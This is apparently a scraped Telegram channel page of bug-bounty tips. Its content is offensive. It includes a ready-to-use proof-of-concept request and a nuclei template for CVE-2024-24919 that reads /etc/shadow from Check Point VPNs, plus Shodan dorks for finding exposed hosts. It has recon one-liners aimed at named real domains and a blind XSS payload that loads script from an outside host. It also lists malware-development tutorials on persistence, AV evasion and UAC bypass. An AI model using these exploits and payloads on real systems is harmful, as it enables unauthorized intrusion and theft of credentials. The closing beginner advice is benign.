uz
Feedback
Bug bounty Tips

Bug bounty Tips

Kanalga Telegram’da o‘tish

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Ko'proq ko'rsatish
6 032
Obunachilar
+1224 soatlar
+717 kunlar
+32530 kunlar
Postlar arxiv
Reflected Xss Mind map Check this out give a reaction

give reactions guys please

Stored xss: small mind map
Stored xss: small mind map

photo content

For this vulnerability, just type shodan title:"Check Point" ssl:"target" CVE-2024-24919 POST /clients/MyCRL HTTP/1.1 host: t
For this vulnerability, just type shodan title:"Check Point" ssl:"target" CVE-2024-24919 POST /clients/MyCRL HTTP/1.1 host: target Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #SSLVPN #BugBounty

CVE-2024-24919 * Check Point Remote Access VPN 0-Day * FOFA link * POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #0day #checkpoint

Repost from DailyData😍
CVE-2024-24919 * Check Point Remote Access VPN 0-Day * FOFA link * POC: POST /clients/MyCRL HTTP/1.1 Host: <redacted> Content-Length: 39 aCSHELL/../../../../../../../etc/shadow #0day #checkpoint

Check Point - Wrong Check Point (CVE-2024-24919) Grabbed the ipaddress using shodan and then put it to nuclei code below id:
Check Point - Wrong Check Point (CVE-2024-24919) Grabbed the ipaddress using shodan and then put it to nuclei code below id: CVE-2024-24919 info: name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion author: Addy severity: High metadata: max-request: 1 vendor: checkpoint tags: cve,cve2024,checkpoint http: - method: POST path: - "{{BaseURL}}/clients/MyCRL" body: 'aCSHELL/../../../../../../../etc/shadow' matchers-condition: and matchers: - type: regex part: body regex: - "root:" - "cpep_user:" - type: status status: - 200 https://t.co/YcKOC3DqZL Follow t.me/bugbounty_tech

Check Point - Wrong Check Point (CVE-2024-24919) Grabbed the ipaddress using shodan and then put it to nuclei code below id:
Check Point - Wrong Check Point (CVE-2024-24919) Grabbed the ipaddress using shodan and then put it to nuclei code below id: CVE-2024-24919 info: name: WirelessHART Fieldgate SWG70 3.0 - Local File Inclusion author: Addy severity: High metadata: max-request: 1 vendor: checkpoint tags: cve,cve2024,checkpoint http: - method: POST path: - "{{BaseURL}}/clients/MyCRL" body: 'aCSHELL/../../../../../../../etc/shadow' matchers-condition: and matchers: - type: regex part: body regex: - "root:" - "cpep_user:" - type: status status: - 200 https://t.co/YcKOC3DqZL Follow t.me/bugbounty_tech

Oneliner for Grabbing ip from Shodan shodan search --fields ip_str,port 'http.title:"Check Point SSL Network Extender"' --separator ":" | sed 's/.$//' > file.txt

photo content

if you want to grab the ip after ASN Record u can use this oneline whois -h whois.radb.net -- '-i origin AS8983' | grep -Eo "([0-9.]+){4}/[0-9]+" | uniq -u > ipranges.txt && cat ipranges.txt | mapcidr -silent | dnsx -ptr -resp-only | sort -u > ptrrecords.txt && cat ptrrecords.txt | anew -q subs.txt

Methodology one : First step collect as much as subdomains you can.i use subfinder with my all api keys virustotal,censys,shodan etc no need many other tool for subdomains finding its enough with all api keys + crt.sh manual+automation -recursive flag used for fetching domain of subdomains its called sub sub domains example amazon.amazoncloud.amazon.com many people miss this part and -all switch from its fetch all api from all sources with all api keys subfinder -d google.com -all -recursive > subdomain.txt This oneliner fetch all subdomains from crt.sh curl -s https://crt.sh/\?q\=\amazon.com\&output\=json | jq -r '.[].name_value' | grep -Po '(\w+\.\w+\.\w+)$' Normaly people use httpx default command and they only filter subdomains with port 443 or 80 but many domains contains dashboard or control pannel and login pannel at 8080,8888,8000 port so always include these ports.. cat subdomains.txt | httpx-toolkit -ports 80,8080,8000,8888 -threads 200 > subdomains_alive.txt For checking open ports i used naabu its very fast by this i can check the result of open ports and what service is running on that port is it contain any vulnerable version so i exploit that service thats why port enumeration is important naabu -list subdomains.txt -c 50 -nmap-cli 'nmap -sV -sC' -o naabu-full.txt And for Checking any hidden Directory and files i used dirsearch with onelist for all list that contains many directory and filess used in web and include only status code that one is important..by this you can find many senstive discloure of files and directory i dont use ffuf bcz its give result with lots of waste things and its also blocked by the domains for its fast bruteforcing..thats why i like dirsearch with colorfull and clean output and less errors. dirsearch -l subdomains_alive.txt -i 200,204,403 -x 500,502,429 -R 5 --random-agent -t 50 -F -w /home/coffinxp/oneforall/onelistforallshort.txt -o directory.txt Now for fetching all urls from archive from many source i used gau rather then wayback bcz it use many sources and its all passive you can use katana for active urls and anew with that files.after use uro to filter out duplicates params.. cat subdomains_alive.txt | gau > newparms.txt cat newparms.txt | uro > filterparm.txt And for js files that contains senstive keyss and pass i used grep command you can also fetch it by katana by -jc flag for active js endpoint. cat filterparam.txt | grep ".js$" > jsfiles.txt and for secret keys i used one liner secret finder or you can send it to nuclei custom secret finder that give clean result i will send u that. cat jsfiles.txt | while read url; do python3 /home/coffinxp/SecretFinder/SecretFinder.py -i $url -o cli >> secret.txt; done and then grep all keyss cat secret.txt | grep aws cat secret.txt | grep goole captcha cat secret.txt | grep twilio and in last i send all param to nuclei that contains all types of vulnerability with my custom templates i will share with you all soon after adding more.. before this if you want seperate vulnerability and find with any other tool for specially made for that purpose like for xss use dalfox,for openredirect use openredirex, for lfi use dotdotpwn & lfi suite..filter these with Gf pattren so you only get valid params for that vulnerability and send to nuclei with that specific vulnerability tags --tags xss nuclei -list sorted_wordlist_100000.txt -t /home/coffinxp/Custom-Nuclei-Templates/

.Bug Hunting methodology ------------------------------------------------------------------------- subfinder -d viator.com -all -recursive > subdomain.txt cat subdomain.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 > subdomains_alive.txt katana -u subdomains_alive.txt -d 5 -ps -pss waybackarchive,commoncrawl,alienvault -kf -jc -fx -ef woff,css,png,svg,jpg,woff2,jpeg,gif,svg -o allurls.txt cat allurls.txt | grep -E "\.txt|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.json|\.gz|\.rar|\.zip|\.config" cat allurls.txt | grep -E "\.js$" >> js.txt cat alljs.txt | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ echo www.viator.com | katana -ps | grep -E "\.js$" | nuclei -t /home/coffinxp/nuclei-templates/http/exposures/ -c 30 dirsearch -u https://www.viator.com -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,http://sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,.log,.xml,.js.,.json subfinder -d viator.com | httpx-toolkit -silent | katana -ps -f qurl | gf xss | bxss -appendMode -payload '"><script src=https://xss.report/c/coffinxp></script>' -parameters subzy run --targets subdomains.txt --concurrency 100 --hide_fails --verify_ssl python3 corsy.py -i /home/coffinxp/vaitor/subdomains_alive.txt -t 10 --headers "User-Agent: GoogleBot\nCookie: SESSION=Hacked" nuclei -list subdomains_alive.txt -t /home/coffinxp/Priv8-Nuclei/cors nuclei -list ~/vaitor/subdomains_alive.txt -tags cves,osint,tech cat allurls.txt | gf lfi | nuclei -tags lfi cat allurls.txt | gf redirect | openredirex -p /home/coffinxp/openRedirect

Malware development: persistence - part 1. Registry run keys. C++ example. Malware development: persistence - part 2. Screensaver hijack. C++ example. Malware development: persistence - part 3. COM DLL hijack. Malware development: persistence - part 4. Windows services. Simple C++ example. Malware development: persistence - part 5. AppInit_DLLs. Simple C++ example. Malware development: persistence - part 6. Windows netsh helper DLL. Simple C++ example. Malware AV evasion: part 7. Disable Windows Defender. Simple C++ example. Malware AV evasion - part 8. Encode payload via Z85 algorithm. C++ example. Malware AV evasion - part 9. Encrypt base64 encoded payload via RC4. C++ example. Malware AV/VM evasion - part 10: anti-debugging. NtGlobalFlag. Simple C++ example. Malware AV/VM evasion - part 11: encrypt payload via DES. Simple C++ example. Malware AV/VM evasion - part 12: encrypt/decrypt payload via TEA. Simple C++ example. Malware AV/VM evasion - part 13: encrypt/decrypt payload via Madryga. Simple C++ example. Malware AV/VM evasion - part 14: encrypt/decrypt payload via A5/1. Bypass Kaspersky AV. Simple C++ example. Malware AV/VM evasion - part 15: WinAPI GetModuleHandle implementation. Simple C++ example. Malware AV/VM evasion - part 16: WinAPI GetProcAddress implementation. Simple C++ example. Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe. Simple C++ example. Malware AV/VM evasion - part 18: encrypt/decrypt payload via modular multiplication-based block cipher. Simple C++ example. Malware development: persistence - part 22. Windows Setup. Simple C++ example. Malware and cryptography 1: encrypt/decrypt payload via RC5. Simple C++ example. Malware and cryptography 20: encrypt/decrypt payload via Skipjack. Simple C++ example. Malware and cryptography 21: encrypt/decrypt payload via WAKE. Simple C++ example. Malware development: persistence - part 23. LNK files. Simple Powershell example. Malware development: persistence - part 24. StartupApproved. Simple C example. Malware and cryptography 22: encrypt/decrypt payload via XTEA. Simple C++ example. Malware and cryptography 23: encrypt/decrypt file via TEA. Simple C/C++ example. Malware and cryptography 24: encrypt/decrypt file via Madryga. Simple C/C++ example. Malware and cryptography 25: encrypt/decrypt payload via RC6. Simple C/C++ example. Malware AV/VM evasion - part 15: WinAPI GetModuleHandle implementation. Simple C++ example. Malware AV/VM evasion - part 16: WinAPI GetProcAddress implementation. Simple C++ example. Malware AV/VM evasion - part 17: bypass UAC via fodhelper.exe. Simple C++ example. Malware AV/VM evasion - part 18: encrypt/decrypt payload via modular multiplication-based block cipher. Simple C++ example. Malware development: persistence - part 22. Windows Setup. Simple C++ example. Malware and cryptography 1: encrypt/decrypt payload via RC5. Simple C++ example. Malware and cryptography 20: encrypt/decrypt payload via Skipjack. Simple C++ example. Malware and cryptography 21: encrypt/decrypt payload via WAKE. Simple C++ example. Credit: https://t.me/Devexploit

.

🧵 A Guide to Starting Your Bug Bounty Journey 1/ 🐞 Don't focus too much on CTFs. The bugs you find there rarely exist in real targets. CTFs are great for learning, but real-world hunting is a different game. 2/ 🏆 Avoid starting on platforms like HackerOne, Bugcrowd, or Intigriti. The competition is fierce, making it tough to find your first bug. Start with Vulnerability Disclosure Programs (VDPs) instead. You'll have a better chance and less discouragement. 3/ 🔍 Focus on one type of vulnerability at a time. IDOR is a great starting point. Master one attack vector before moving to the next, like SSRF, XSS, SSTI, or RCE. Specialization helps build strong skills. 4/ 💡 Be smart about where to inject your payloads. Tailor them to your target's tech stack. For APIs, use backend-specific payloads. Avoid generic payloads that don't match the target's technology. 5/ 📚 Read hacktivity on platforms like HackerOne. These are real bugs on real targets. It's one of the best ways to learn effective attack methods. 6/ 🛠️ Don't rely on default nuclei templates. Create custom ones to avoid duplicates. Customization can give you an edge. 7/ 🤝 Collaborate with experienced hackers. Learn from those who have already found vulnerabilities. Knowledge sharing is invaluable. 8/ 🐦 Join Twitter (or X). Top hackers share tons of valuable information there. Take notes, ask questions, and don't be shy. The worst that can happen is no response, and that's okay. 9/ 💸 Avoid paid tools as a beginner. First, learn the ropes. Once you start earning, consider investing in them. Smart investments come after gaining knowledge and experience. 10/ 🔍 Master Google dorking. It's a crucial skill for any hacker. The ability to find sensitive information through search engines is invaluable. 11/ 🛠️ Found an exploit on Google Hacking Database? Verify it! Ensure the target uses the relevant tech stack. Use Docker to replicate the environment and test the exploit on your local setup. This method sets apart pros from script kiddies. 12/ 🧠 Learn some coding. Understanding the technology you're hacking is essential. Each exploit is different, and knowing the tech helps you adapt your approach. 13/ 🔥 Success in bug bounties comes with hard work. Read source code, understand endpoints, and go beyond brute-forcing. Dedication and effort pay off. If you’re willing to put in the work, you can achieve significant success. 14/ 🌟 Remember, it's a marathon, not a sprint. With persistence and smart strategies, you can achieve your goals. If I can do it, so can you. Let's get to work! 🚀 #BugBounty #CyberSecurity #Hacking